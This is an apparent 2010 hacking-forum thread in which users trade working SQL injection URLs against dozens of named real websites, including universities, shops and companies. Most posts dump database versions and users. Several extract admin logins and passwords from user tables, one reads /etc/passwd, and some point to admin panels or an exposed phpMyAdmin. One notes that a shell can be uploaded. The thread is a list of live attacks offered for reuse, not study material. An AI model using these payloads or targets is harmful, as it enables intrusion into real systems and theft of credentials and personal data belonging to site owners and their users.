View full version: SQL Injections
CyberHunter
30.06.2010, 01:25
TIC - 60
Code:
http://treeofmoney.ru/pour.php?id=-74034+union+select+1,2,3,concat(user(),version(),d atabase()),5+--+
User: nitsik@localhost
Version: 5.0.90
Database: tree
CyberHunter said:
TIC - 60
Code:
http://treeofmoney.ru/pour.php?id=-74034+union+select+1,2,3,concat(user(),version(),d atabase()),5+--+
User: nitsik@localhost
Version: 5.0.90
Database: tree
Repost. It just hadn't been indexed.
Code:
http://www.biotruck.co.uk/index.php?men=press+UNION+SELECT+1,concat_ws(0x3a, version(),user(),database()),3+--+
Code:
http://www.onix.by/index.php?m=1&c=-1+UNION+SELECT+1,2,concat_ws(0x3a,version(),user() ,database()),4,5,6,7+--+
Code:
http://www.glavbukh.ru/gbDm.php?id=-2057+'+AND+1=0+UNION+SELECT+1,2,3,concat_ws(0x3a,v ersion(),user(),database()),5+--+
Code:
http://www.kuhnimaster.ru/?id=1005&ibID=-15+'+UNION+SELECT+1,2,3,4,concat_ws(0x3a,user(),ve rsion(),database()),6,7,8,9,10,11,12,13,14,15,16,1 7+--+
Code:
http://www.iaath.com/news_anno_view.php?id=-78+UNION+SELECT+1,2,3,concat_ws(0x3a,version(),use r(),database()),5,6,7+--+
Code:
http://www.collaborativeagency.com/speaker.php?Num=21366+UNION+SELECT+1,concat_ws(0x3 a,version(),user(),database()),3,4,5,6,7,8,9,10,11 ,12,13++--+
and once again, KOSTROMA
http://k156.ru/sprav/catview.php?cat_id=-2+and+1=2+union+select+1,2,concat_ws(0x3a,version( ),user(),database(),@@version_compile_os),4,5,6,7, 8,9,10,11,12,13,14,15,16,17,18--
version : 5.0.32-Debian_7etch12-log
user : kostroma_org@77.221.130.2
database : kostroma_org
os : pc-linux-gnu
Code:
http://www.qpflowers.ru/raskazread.php?idArticle=-17+union+select+concat%28user%28%29,version%28%29, database%28%29%29,2,3%20--
version : 4.0.27-max-log
database : autoanry_cvet
user : autoanry_cvet@v24.valuehost.ru
http://www.spectrum-watches.com/new.php?id=-2+union+select+1,2,3,group_concat(0x0b,name,0x3a,p assword),5,6,7+from+users--&usernews=
PR 4
http://www.grow3c.com/contact_popup.php?id=-2+union+select+1,concat_ws(0x3a,email, password),3, 4+from+member/*
http://www.logos-pravo.ru/article.php?id=-82'+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,vers ion(),database(),user(),@@version_compile_os),9,10 ,11,12,13,14+--+&root=23
Database Version: 5.0.26-log
Database name: logospravo
User name: logospravo@localhost
Os: linux
fenixelite
01.07.2010, 13:14
Code:
http://www.teachshop.ru/?news=-1+Union+Select+1,2,concat_ws%280x3a,login,passw%29 ,4+from+ts_user+--
TIC 2500
http://www.vch.ru/cgi-bin/guide.cgi?table_code=44&action=show&id=-1065+union+select+concat_ws(0x3a,version(),databas e(),user(),@@version_compile_os),2,3
5.0.79:wwwcust:wwwcust@localhostc-linux-gnu
[Feldmarschall]
01.07.2010, 15:03
http://www.lomospain.com/tienda/detalle.php?id=-235+union+select+1,2,3,version%28%29,5--
Version: 4.1.20
Database: lomospain
User: lomospain@localhost
http://yahoo.jponline.ru/main.php?id=2084048437+and+substring(version(),1,1 )=5
MOSTURFLOT
http://www.mosturflot.ru/seacruises/ships/index.php?ship_id=-80+and+1=2+union+select+1,concat_ws(0x3a,@@version ,user(),database(),@@version_compile_os),3,4+--
version : 5.0.83
user : mosturflot@localhost
database : mosturflot
os : alt-linux-gnu
http://www.mosturflot.ru/seacruises/ships/index.php?ship_id=-80+and+1=2+union+select+1,concat_ws(0x3a,name,user name,password,email),3,4+from+j_users+limit+0,1--
root_sashok
02.07.2010, 13:33
Code:
http://www.windowware.co.uk/product_list.php?m=-1+union+select+1,2,user(),database(),5,6,7,8,versi on(),10--
User: windowweb
Database: ww_sys@localhost
Version: 4.1.22
I'm back
Code:
http://www.aspect.dubna.ru/new/page.php?page=301+union+select+concat_ws(0x3a,user (),version(),database())--
User: aspect@localhost
Database: aspect
Version: 5.0.51a-log
PR 4
Code:
http://www.pritchi.net/modules/arms/index.php?cat=-1+union+select+concat_ws%280x3a,user%28%29,version %28%29,database%28%29%29,2,3%20--
user : shurko@localhost
version : 4.1.20
database : www_pritchi_net_-_pritchi
http://www.retirevic.com.au/about.php?id=-3+union+select+1,2,3,group_concat(0x0b,user_id,0x3 a,user_password)+from+rv_auth_user--
http://www.outrest.ru/board/board-bike/index.php?oid=-792+and+1=2+union+select+1,2,3,concat_ws(char(58), @@version,user(),database(),@@version_compile_os), 5,6,7,8,9,10,11,12--
version : 4.1.22-lk-log
user : collspbru_rest@localhost
database : collspbru_rest
0s : pc-linux-gnu
Host Information
Server = Apache
Version = 5.1.45-1~bpo50+1-log
Powered by = PHP/5.2.6-1+lenny8
Attack Type = SQL Union Injection
Current User = gspatialhistory5@www04.Stanford.EDU
Current Database = g_spatialhistory_shwebsite
Supports Union = yes
Union Columns = 16
Vuln: http://www.stanford.edu/group/spatialhistory/cgi-bin/site/viz.php?id=121+and+1=0+ Union Select 1,2, UNHEX(HEX([visible])) ,4,5,6,7,8,9,10,11,12,13,14,15,16
Code:
http://zoolinks.info/info.php?id=1+union+select+1,2,3,4,table_name,6,7+ from+information_schema.tables+limit+0,1%20--
user : webtrudi_zoo@89.149.244.210
version : 5.0.37-standard
database: webtrudi_zoo
os : pc-linux-gnu
http://vlauto.ru/cars/index.php?idbrand=-9+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,concat _ws(0x3a,@@version,user(),database(),@@version_com pile_os),12+--&id=2
version : 5.0.91-community-log
user : vlautoru_auto@localhost
atabase : vlautoru_db
os : unknown-linux-gnu
TIC 30 PR 4
http://www.stroika.md/detail.php?id=-1703+union+select+1,2,3,concat_ ws(0x3a,user,password),5,6,7 ,8+from+mysql.user--
output appears in the title
My first one
http://www.worstpreviews.com/headline.php?id=-17072+union+select+1,version(),3,4,5,6,7,8--+
Version: 5.0.90-log
User: alexgi_2@localhost
Database: alexgi_worstreview@localhost
-------------------------------------------------------------------------------------------------
and one more
http://www.steinerbooks.org/p.php?id=-11+union+select+1,version()29,3,4,5,6,7,8,9--+
version: 4.1.22
user:anthroposophic@localhost
---------------------------------------------------------------------------------------------------
http://www.giuciao.com/books/book.php?id=-3748+union+select+1,concat_ws(0x3a,version(),user( )),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20, 21,22,23,24,25--+
version: 5.0.32-Debian_7etch5
user: bookhtml93843@217.64.202.205
http://www.wscal.edu/bookstore/store/details.php?id=-2022+union+select+1,concat_ws(0x3a,user(),version( )),3,4,5,6,7,8,9,10,11--+
wmsem28_wmsem28@localhost:4.0.27-standard
root_sashok
04.07.2010, 16:14
Code:
http://www.barcelo.edu.ar/vernoticia.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,unhex(hex(conc at_ws(0x3a,user(),version(),database()))),12,13,14 ,15,16,17,18,19,20,21--
Username: uv0001@localhost
Version: 4.1.14-log
Database: uv0001_barcelo
Code:
http://www.ms.edu.mn/index.php?option=user_com_sambar&parent=5&id=4&menu_id=5+union+select+1,2,3,unhex(hex(concat_ws(0 x3a,user(),version(),database()))),5,6,7,8--
Username: mat@localhost
Version: 5.0.75-0ubuntu10.2
Database: mathweb
The following information is for informational purposes only. I bear no responsibility for your actions.
Data from the v2_users table is accessible.
Code:
http://www.ms.edu.mn/index.php?option=user_com_sambar&parent=5&id=4&menu_id=5+union+select+1,2,3,4,concat_ws(0x3a,user _name,password),6,7,8+from+v2_users--
Tables:
Code:
http://www.ptoservis.ru/photo.php?id=2525+union+select+1,concat_ws(0x3a,us er(),database(),version()),3,4--
Username: u45581@10.10.11.45
Version: 5.0.67-log
Database: u45581
Code:
http://www.litinstitut.ru/index.php?p=gallerypic&img_id=-1+union+select+1,2,3,4,5,6,database(),8,9--
Username: root@localhost
Version: 4.1.22-community-nt
Database: site
BrainDeaD
04.07.2010, 18:17
Code:
http://трансгарант.рф/en/press-center/press-release/index.php?id=911+union+select+1,2,3,4,concat_ws(0x 3a,database(),version(),user()),6,7,8,9
database:wwwtransgarantlg
version:4.0.25
user:transgar@bux.hc.ru
Code:
http://www.metaltorg.ru/catalogue/show.php?id=-22533+union+select+1,version() --
5.0.67-log
Code:
http://www.metaltorg.ru/catalogue/show.php?id=-22533+union+select+1,concat_ws%280x3a,Adm_login,Ad m_Password%29+from+banner.Admin --
PR5
root_sashok
04.07.2010, 20:08
Code:
http://www.aladeo.ru/video/show.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,user(),versi on(),database()),6,7,8,9,10,11--
Username: Eugene@localhost
Version: 5.0.45-community-nt
Database: artvideo2
Tables:
Code:
pma
table
info
Code:
http://www.olimpgroup.ru/index.php?ob=list_one&id=-1+union+select+1,concat_ws(0x3a,user(),version(),d atabase()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34, 35,36,37,38,39,40--
Username: olimpgro@localhost
Version: 4.1.25-log
Database: wwwolimpgroupru
Code:
http://izottex.ru/index.php?page=page&id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,user(),ver sion(),database(),@@version_compile_os),7--
Username: neosphru_iztx@localhost
Version: 5.0.26-log
Database: neosphru_iztx
OS: pc-linux-gnu
Code:
http://www.gilsf.ru/order/?comid=-1+union+select+1,concat_ws(0x3a,user(),version(),d atabase(),@@version_compile_os),3,4,5,6,7,8,9,10,1 1,12,13--
Username: u68927@10.8.0.129
Version: 5.0.90-log
Database: u68927
OS: portbld-freebsd7.2
Output the tables using LIMIT.
GorodRyazan.ru
http://www.gorod.ryazan.ru/catalog/index.php?category=-2+and+1=2+union+select+1,2,concat_ws(0x3a,@@versio n,user(),database(),@@version_compile_os),4,5+--
version : 4.1.22-standard-log
user : gorodry_ght@localhost
database : gorodry_ctlg
os : pc-linux-gnu
jecka3000
04.07.2010, 22:35
Code:
http://www.profileracing.com/news_full.php?id=-1001+union+select+concat(version(),0x20,database() ,0x20,user()),2,3,4,5,6,7--
5.1.47-community-log
profiler_web
profiler_webuser@localhost
Code:
http://depts.washington.edu/engl/people/profile.php?id=-29+union+select+concat(version(),0x20,database(),0 x20,user()),2,3--
5.0.27-standard
engl
englbrowser@depts01.u.washington.edu
Code:
http://library.uncc.edu/knowledgebase/question.php?q=-317+union+select+1,concat(version(),0x20,database( ),0x20,user()),3,4,5,6,7,8,9--
5.0.32-Debian_7etch8-log
silk
mozilla@localhos
Code:
http://support.pa.msu.edu/howto.php?id=-95+union+select+1,concat(version(),0x20,database() ,0x20,user()),3,4,5,6,7,8,9,10,11,12,13,14--
5.0.77
supportsite
smgr@force.pa.msu.edu
Code:
http://www.worstpreviews.com/headline.php?id=-17882+union+select+1,concat(version(),0x20,databas e(),0x20,user()),3,4,5,6,7,8--
5.0.90-log
alexgi_worstreview
alexgi_2@localhost
Code:
http://dl.lib.brown.edu/francophone/browse2.php?id=-4+and+1=2+union+select+1,2,3,4,5,6,7,8,unhex(hex(c oncat(version(),0x20,database(),0x20,user())))--+
4.1.22
francophone
guest@localhost
http://www.mgwalk.com/Temp_Topic_View.php?ID=-16+union+select+1,concat(username,0x20,user_passwo rd,0x20,user_type),3,4,5,6,7,8,9,10,11,12,13,14+fr om+phpbb_users+limit+1,1--
http://campus.augustana.edu/acknowledge/template.php?id=-418+union+select+1,2,concat(username,0x20,password ),4,5,6,7,8+from+alumniadmin.users+limit+1,1--
http://ebusiness.byu.edu/book_review.php?ID=-6+union+select+1,concat(password,0x20,netID),3,4,5 ,6,7,8,9,10+from+wd_user+limit+7,1--
Code:
http://rybalka.zooclub.ru/indexr.php?id=-5+union+select+table_name,2+from+information_schem a.tables --
user : zooclub_zooclub@localhost
version : 5.0.91-community-log
database : zooclub_rybalka
http://www.okfurniture.com/news.php?id=-17+union+select+1,2,3,group_concat(id,char(58),use rname,char(58),password)+from+ok_admins
http://alliance.la.asu.edu/azga/news.php?id=-66+union+select+1,concat_ws%280x3a,version(),user( )),3,4,5,6,7+from+mysql.user--+
5.0.75-0ubuntu10.3:gph211@localhost
Kind of a repost, but your SQL injection is just in a different place.
Steam games shop
Code:
http://keybox.com.ua/?m=8+and+1=0+union+select+1,concat_ws%280x3a,versi on(),user( )),3--+
5.0.90-community:vikt_1@localhost
CyberHunter
05.07.2010, 14:05
http://www.healthbynaturalhelp.info/index.php?action=view_article&id=1&module=articlemodule&id=-1+union+select+1,2,3,4,5,6+--+
User: dbo278217868@74.208.16.246
Database: db278217868
Version: 5.0.81-log
PageRank: 2
------------------------
http://www.npspb.ru/index.php?action=view_article&id=21&module=articlemodule&id=-1+union+select+1,2,3,4,5,6+--+
User: admin_db@localhost
Database: EXP_NPSPB
Version: 4.1.18
PageRank: 3
CY: 30
------------------------
http://www.thrive-pt.com/index.php?action=view_article&id=5&module=articlemodule&id=-1+union+select+1,2,3,4,5,6+--+
Database: thriveptdb
Version: 5.0.83-log
User: wda4cb@cgi1103.int.bizland.net
PageRank: 2
------------------------
http://www.arabhorsesociety.com/index.php?module=articlemodule&action=view_article&id=-5+union+select+1,2,3,4,5,6+--+
Database: argoshil
User: argoshil@209.235.156.31
Version: 4.1.22-standard
PageRank: 4
------------------------
http://www.kahuarecords.com/index.php?action=view_article&id=11&module=articlemodule&id=-1+union+select+1,2,3,4,5,6+--+
Database: mauirtrt_exp_nscms
User: mauirtrt_nsexp@localhost
Version: 5.0.51a-community
PageRank: 3
------------------------
http://www.eberhartsigns.net/index.php?action=view_article&id=3&module=articlemodule&id=-1+union+select+1,2,3,4,5,6+--+
Database: eberhartsigns
User: eberhartsigns@localhost
Version: 5.0.24a-standard
------------------------
http://www.bristolpegasus.com/index.php?action=view_article&id=9&module=articlemodule&id=-1+union+select+1,2,3,4,5,6+--+
Database: bristolp_exponentcms
User: bristolp_cms@localhost
Version: 5.0.89-community
Pagerank: 3
------------------------
http://moreversatile.com/index.php?action=view_article&id=4&module=articlemodule&id=-1+union+select+1,2,3,4,5,6+--+
Database: vmsnet_mvEXP
User: vmsnet_MVMS@localhost
Version: 5.0.51a-community
------------------------
http://www.ascensionhealing.sg/web/index.php?action=view_article&id=117&module=articlemodule&id=-1+union+select+1,2,3,4,5,6+--+
Database: providem_as4
User: providem_ah4@localhost
Version: 4.1.22-standard
PageRank: 2
------------------------
CyberHunter
05.07.2010, 19:03
http://www.aprileonline.info/notizia.php?id=-14209+union+select+1,2,3,4,5,6,7,8,concat(user(),v ersion(),database()),10,11,12,13,14,15,16,17+--+
User: aprile_info@localhost
Database: aprileonline_info
Version: 5.0.27
PageRank: 5
CY: 20
Admin Panel: http://www.aprileonline.info/administrator/
Users: http://www.aprileonline.info/notizia.php?id=-14209+union+select+1,2,3,4,5,6,7,8,group_concat(us ername),group_concat(password),11,12,13,14,15,16,1 7+from+_users--+
The passwords are the same as the logins. A shell can be uploaded, but it has no permissions for anything.
-------------------------
http://www.articolo21.org/notizie/-10+union+select+1,2,3,4,5,6,7,8,concat(user(),vers ion(),database()),10,11,12,13,14,15,16,17+--+/1_audio-notizie.html
User: elzevira21@localhost
Database: articolo21_info
Version: 5.0.77
PageRank: 6
CY: 10
Admin Panel: http://www.articolo21.org/administrator/
-------------------------
POMOR FAIR
http://www.pomfair.ru/news.php?page=news&podr=-54+and+1=2+union+select+1,concat_ws(char(58),@@ver sion,user(),database(),@@version_compile_os),3,4+--
version : 5.0.32-Debian_7etch12-log
user : z104082_pfair@77.221.130.24
database : z104082_pfair
os : pc-linux-gnu
http://www.fotoline.ru/goods.php?id=-296+union+select+1,2,3,4,5,concat_ws(0x3a,version( ),user(),database(),@@version_compile_os),7,8,9,0, 1,2/*
4.1.22-standard:fotoline_foto@localhost:fotoline_shopc-linux-gnu
http://www.moy-pes.ru/view_dekor.php?id=-1'+union+select+1,concat_ws(0x3a,version(),user(), database()),3,4,5--+
version:5.0.67-percona-highperf-b7-log:
user:cobra666@localhost:
database:cobra666_moy-pes@localhost
CyberHunter
05.07.2010, 22:51
----------------------
http://nicoteraroofing.com/index.php?action=view_article&id=1&module=articlemodule&id=-1+union+select+1,2,3,4,5,6+--+
User: nr_exponent@208.109.14.77
Database: nr_exponent
Version: 5.0.91-log
----------------------
http://www.earthrace.net/index.php?action=view_article&id=60&module=articlemodule&id=1&module=articlemodule&id=-1+union+select+1,2,3,4,5,6+--+
User: earthrace_db@localhost
Database: earthrace_cms
Version: 4.1.22-standard
PageRank: 5
CY: 10
----------------------
http://www.adozionepercorsi.it/index.php?action=view_article&id=37&module=articlemodule&id=-1+union+select+1,2,3,4,5,6+--+
User: Sql210476@62.149.141.97
Database: Sql210476_1
Version: 5.0.91-enterprise-gpl-log
PageRank: 2
----------------------
http://www.langanesbyggd.is/category.php?catID=-17+union+select+1,2,3,4,5,6,7
PR-5
----------
http://www.decode.com/news/news.php?story=-142+union+select+1,2,3,4
OS : Red hat
PR-7
TIC-50
TIC 110 PR 2
http://magput.ru/?id=10&viewprog=4177+union+select+concat_ws(0x3a,login, pass)+from+db _magput.users--
output appears in the page source, in the "Check seat availability" button
magadmin.ru/admin
winstrool
06.07.2010, 13:26
http://www.worlddancenewyork.com/artist-details.php?artistid=-40+union+select+1,2,3,4,5,version(),7,8
5.0.91-community
TIC: 0
PR: 5
http://niksplus.ru/index.php?id_=2+union+select+1,2,3,4,concat_ws(0x3 a,login,pass word),6,7,8,9, 10,11,12+from+ users--
although SQL injection isn't needed here:
http://niksplus.ru/phpmyadmin/main.php
http://www.beautycall.co.uk/gallery.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),databa se(),user())--
5.0.67:beautycall_co_uk_webmowat@localhost
http://www.beautycall.co.uk/forum (phpbb_users)
PR3
Leone_510
07.07.2010, 01:19
Code:
http://www.storycenter.org/stories/index.php?cat=-8/**/union/**/select/**/1,2,3,4,5,concat(version(),0x3b,user(),0x3b,databa se()),7/*
4.1.25-Debian_mt1;db3911_sc@64.13.192.29;db3911_theater
Leone_510
07.07.2010, 01:48
Code:
http://www.pellami.ru/show.php?cat=1+union+select+1,2,concat(version(),0 x3b,user(),0x3b,database()),4,5--
5.0.90;pellamiru@78.108.81.131;pellamiru
PHP:
http://goldenformula.net/news.php?id=-6+union+select+1,2,3,4,concat_ws(0x3a,version(),da tabase(),user()),6--
http://goldenformula.net/news.php?id=-6+union+select+1,2,3,4,concat_ws(0x3a,username,pas sword),6+from+jos_users+limit+0,1--
5.0.90-log:u141047:u141047_gf@10.8.0.112
TIC130
PR3
Code:
http://www.ukfinewatches.com/buy.php?id=-33+union+select+1,2,3,4,5,version(),database(),8,9 ,10,11,12,13,14,15,16,17,18,user()--
Getty said:
Code:
http://www.ukfinewatches.com/buy.php?id=-33+union+select+1,2,3,4,5,version(),database(),8,9 ,10,11,12,13,14,15,16,17,18,user()--
Well done, you know how to copy-paste (http://forum.xakep.ru/fb.aspx?m=1929370), but copy-paste belongs in a different section here
architecture.mit.edu
PageRank 7/10
root@localhost*5.0.37*mit_doa
HTML:
http://architecture.mit.edu/news-events.php?evt=-58+union+select+1,2,load_file('/etc/passwd'),4,5,6,concat_ws(0x2a,user(),version(),dat abase()),8,9,10,11,12,13--
Genesys Logic company http://www.incentia.com/images/customers/genesyslogic_logo.jpg
http://www.genesyslogic[antigoogle].com/_en/product_01_1.php?id=-26+union+select+1,concat(username,char(58),passwor d),3,4,5,6,7,8,9,10,11+from+admin
OS : Red Hat
PR-5
TIC-60
http://www.aeroprize-n.ru/dom.php?ID=-182+union+select+1, 2,version()--
http://realty.south.ru/dom.php?id=-217+union+select+version()-- TIC 425 PR 4
KALEVA quality windows
http://www.okna.ru/news/?id=-132+and+1=2+union+select+1,2,3,4,concat_ws(char(58 ),@@version,user(),database(),@@version_compile_os ),6,7+--
version : 5.1.45-log
user : root@localhost
database : oknaru
os : portbld-freebsd8.0
-PRIVAT-
09.07.2010, 20:18
http://www.bulgaria-st.ru/dom.php?id=-195+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24
USER-bulgari7_SNT@localhost
VERSION()-4.1.25-log
My first site from the Runet.
http://neoklimat.ru/faq.php?id=-923+union+select+1,concat_ws%280x3a,version%28%29, user%28%29%29,3,4
USER-u180296_woll@10.8.0.113
VERSION()-5.0.90-log
TIC-10
http://woll-rus.ru/faq.php?id=-913+union+select+1,concat_ws%280x3a,version%28%29, user%28%29%29,3,4%20--
USER-u180296_woll@10.8.0.113
VERSION()-5.0.90-log
TIC-10
http://www.lifeskillstraining.com/faq.php?id=-4+union+select+1,group_concat%28id,0x3a,username,0 x3a,password,0x3c62723e%29,3,4+from%20admin --
/\
This will output the admins' logins and passwords
USER-p253j7ml_lstdb@localhost
VERSION()-5.0.67-community
PR-6
http://www.citrox.net/faq.php?id=-161+union+select+1 --
PR-4
PHP:
http://www.compudrug.com/show.php?id=-8+union+select+1,2,3,4,concat_ws(0x3a,version(),da tabase(),user()),6,7,8,9,10,11,12,13,14--
5.0.38-Ubuntu_0ubuntu1.4-log:compudrug:pentacom@localhost
PR5
-PRIVAT-
10.07.2010, 10:58
http://www.uso.ru/pg.php?id=-45+union+select+1,concat_ws%280x3a,username,passwd ,permis%29,3,4,5,3,7,8+from+adms%20-- --
/\
This will output the admins' logins and passwords
USER-salutsu_uso@localhost
VERSION()-5.0.51a-24+lenny3
PR-2
TIC-20
http://www.budaphone.com/press.php?id=-1+union+select+1,user%28%29,version%28%29,4%20--
USER-budaphon@zvm1.host.ru
VERSION()-4.0.27-log
PR-3
TIC-40
REPOST
USER-vmaldives@68.178.254.104
VERSION()-4.1.24-max-log
PR-6
TIC-50
http://www.sharsheret.org/faq.php?ID=-30+union+select+1,2 --
USER-sharsheret@208.109.14.103
VERSION()-4.0.30-max-log
PR-6
TIC-50
http://www.gourditas.com/heart.php?id=-45+union+select+1,concat_ws%280x3a,version%28%29,0 x3a,user%28%29%29,3,4 --
USER-hightheo_jnegro@localhost
VERSION()-4.1.22-standard
http://m2.irkutsk.ru/terra/terra.php?id=-1273570566+union+select+1,concat_ws%280x3a,id=1,0x 3a,login,0x3a,0x3a,password%29,3,4,5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22+from+2bsoft6_use rs+Where+id=1%20--
/\
This will output the admins' logins and passwords
USER-u19786@10.10.10.228
VERSION()-5.0.67-log
PR-3
TIC-1900
http://www.phada.org/job.php?id=-2475+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 %20--
USER-phada_ksenzee@localhost
VERSION()-4.1.22-standard
PR-3
TIC-40
http://www.lcgh.net/job.php?job_id=-33+union+select+1,2,version%28%29,4,user%28%29 --
USER-lcgh@localhost
VERSION()-5.0.45-community-nt
PR-4
http://www.toddjobs.com/job.php?ID=-125+union+select+1,2,3,4,5,user%28%29,7,8,9,10,11, 12,13,version%28%29 --
USER-browns01@64.71.32.51
VERSION()-4.1.22-standard-log
PR-3
winstrool
10.07.2010, 17:33
http://indiauktravel.co.uk/more.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,uname,pass ,name,email),7+from+admin--&contentid=1
http://www.prodazhadvd.com/catalog/store/more.php?id=-5305+union+select+1,2,version(),4,5,6,7,8,9,0,11,1 2,13,14,15,16,17,18,19,20,21,22,23--
dating in Nizhny Novgorod www.love.r52.ru/
http://www.love.r52.ru/view.phtml?type=gtob&s=-1+and+1=2+union+select+1,2,3,4,5,6,7,concat_ws(0x3 a,@@version,user(),database(),@@version_compile_os ),9,10,11,12,13,14,15,16,17,18,19,20,21,22+--
version : 5.0.51a
user : love@localhost
database : love
os : portbld-freebsd7.0
http://www.love.r52.ru/view.phtml?type=gtob&s=-1+and+1=2+union+select+1,2,3,4,5,6,7,concat_ws(0x3 a,name,pass),9,10,11,12,13,14,15,16,17,18,19,20,21 ,22+from+forum_user--
emillord
10.07.2010, 22:40
http://www.firstfordrivers.co.uk/job-seekers/view-job.php?id=8+union+select+1,2,3,4,concat_ws(0x3a,v ersion(),user(),database(),@@version_compile_os),6 ,7,8,9,10,11,12,13,14,15--+
PR3
OS: linux-gnu
User: firstfor_first@localhost
Version: 5.0.91-community
Database: firstfor_firstfor
http://www.claireducharme.com/journal.php?id=-00001+union+select+1,concat_ws(0x3a,version(),user (),database(),@@version_compile_os)
PR1
OS - linux-gnu
User - ducharme@68.178.211.41
Version - 4.0.30-max-log:
Database - ducharme
http://jasonhanson.net/journal.php?id=-26+union+select+1,2,3,concat_ws%280x3a,version%28% 29,user%28%29,database%28%29,@@version_compile_os% 29,5--+
OS: pc-linux-gnu
User: jason_home@localhost
Version: 4.1.22-standard
Database: ason_dev
http://onyourmoney.com/journal.php?id=-104+union+select+1,2,3,concat_ws(0x3a,version(),da tabase(),user(),@@version_compile_os)
PR5
OS: debian-linux-gnu
User: onmoney_benfran@localhost
Version: 5.0.51a-24+lenny3-log
Database: onmoney_onyourmoney
emillord
11.07.2010, 16:33
http://www.vintil.ru/faq.php?id=-917+union+select+1,concat_ws%280x3a,version%28%29, database%28%29,user%28%29,@@version_compile_os%29, 3,4,5--+
OS: portbld-freebsd7.2
User: u180296@10.8.0.113
Version: 5.0.90-log
Database: u180296_vintil
-PRIVAT-
11.07.2010, 21:11
http://www.windward-islands.net/crewed/yacht-us.php?ID=-311+union+select+1,version%28%29,3,user%28%29,5,6, 7,8,9,@@version_compile_os,11,12,13,14,15,16,17,18 ,19 --
USER-sailing@localhost
VERSION()-5.0.51a-log
OS()-portbld-freebsd6.3 passengers maximum
PR-4
TIC-10
http://www.engeniustech.com.sg/faq.php?ID=-9+union+select+1,2,3,4,concat_ws%280x3a,user%28%29 ,version%28%29,@@version_compile_os%29 --
USER-engeniusdbuser@localhost
VERSION()-5.0.77
OS()-redhat-linux-gnu
PR-3
http://www.colesbay.com.au/food.php?id=-8+union+select+1,2,3 --
TIC-10
PR-4
emillord
11.07.2010, 23:17
http://www.vedatransit.com/page.php?issue_id=-3+union+select+1,2,3,4,5,concat_ws%280x3a,@@versio n_compile_os,user%28%29,version%28%29,database%28% 29%29,7,8,9,0,1--+&parent_id=0
TIC10 PR2
OS: portbld-freebsd6.3
User: vedatransitcom@localhost
Version: 5.0.90:
Database: vedatransitcom
http://www.comtid.com/catalog.php?id=-41+union+select+1,2,concat_ws%280x3a,@@version_com pile_os,user%28%29,version%28%29,database%28%29%29 ,4,5,6,7,8--+&action=show_object
TIC10 PR2
OS: portbld-freebsd6.3
User: comtidcom@localhost
Version: 5.0.90
Database: comtidcom
http://www.nlpfurniture.com/catalog.php?id=-4+union+select+1,concat_ws%280x3a,@@version_compil e_os,user%28%29,version%28%29,database%28%29%29,3, 4,5,6,7,8,9,0,1,2,3--+
TIC0 PR4
OS: unknown-linux-gnu
User: nlpfurniture@dish4091.net.ibizdns.com
Version: 5.0.22-standard
Database: nlpfurniture
http://belaquilon.com/catalog_page.php?id=0+union+select+1,2,3,4,5,6,7,8 ,9,0,1,2,3,4,5,6,concat_ws%280x3a,@@version_compil e_os,user%28%29,version%28%29,database%28%29%29,8, 9,0--+
PR3
OS: unknown-linux-gnu:
User: belaquilon@localhost
Version: 5.1.44-community-log
Database: victor_belaquilon
P.S. Doesn't seem to be a repost, since only the domain in the .by zone has been posted, and this one is in .com
http://ozscooter.com/catalog.php?id=20&c_id=-8+union+select+concat_ws%280x3a,@@version_compile_ os,user%28%29,version%28%29,database%28%29%29--+
PR0
OS: unknown-linux-gnu
User: ozsbhak6_admin@localhost
Version: 5.0.90-community
Database: ozsbhak6_ozscooter
http://www.stylisdesigns.com/catalog.php?ID=-79+union+select+1,2,3,concat_ws%280x3a,@@version_c ompile_os,user%28%29,version%28%29,database%28%29% 29,5,6,7,8,9,0,1,2,3,4,5--+
PR0
OS: redhat-linux-gnu
User: swdata@localhost
Version: 4.1.22
Database: stylis
enterprises of the processing complex of the Ural Mining and Metallurgical Company
http://www.ocm.ru/ru/index.php?id15=-8681+and+1=2+union+select+1,2,3,4,5,6,7,8,concat_w s(char(58),version(),user(),database(),@@version_c ompile_os),10,11,12,13,14,15,16,17,18--
version : 4.1.22
user : ummc@localhost
database : ummc
os : portbld-freebsd6.2
http://www.socwall.com/browse/wpDL.php?wp_id=018504+union+select+1,2,3,4,5/*
P.S. A cool little site with pictures
Gar|k: Konqi, that's exactly why I posted it here; I'm too lazy to work it through myself, whoever needs it can deal with it
Shram-spb
12.07.2010, 04:22
Code:
http://www.swing-kiska.ru/modules.php?name=News&new_topic=-6'+union+sel ect+1,2,3,concat_ws (':',user_email,user_password,user _icq,femail,user_id,name),5,6,7,8,9,0,1,2,3,4,5,6+ fro m+start nuke_users/*
43k users
-PRIVAT-
12.07.2010, 10:38
http://www.ventoniemi.fi/faq.php?id=-4+union+select+1,2,concat_ws%280x3a,user%28%29,@@v ersion_compile_os,version%28%29%29,4
USER-admin@localhost
VERSION()-5.0.32-Debian_7etch12-log
OS()-pc-linux-gnu
PR-4
http://www.sora.fi/faq.php?id=-4+union+select+1,2,concat_ws(0x3a,user(),@@version _compile_os,version()),4 --
A copy of the site above.
USER-admin@localhost
VERSION()-5.0.32-Debian_7etch12-log
OS()-pc-linux-gnu
PR-4
http://www.faarbi.com/ar/news.php?do=view_detail&id=-1+union+select+1,2,concat_ws%280x3a,version%28%29, user%28%29,@@version_compile_os%29%20 --
USER-faarbic_faarbic@localhost
VERSION()-5.0.85-log
OS()-portbld-freebsd7.0
http://www.eigenhuismakelaar.nl/faq.php?id=-306+union+select+1,2
PR-2
http://winpyme.com/soporte/faq.php?id=-16+union+select+1,2,concat_ws%280x3a,user%28%29,ve rsion%28%29,@@version_compile_os%29,4,5 --
USER-aa2758@maria.es.34web.net
VERSION()-4.0.25
OS()-pc-linux-gnu
PR-3
TIC-10
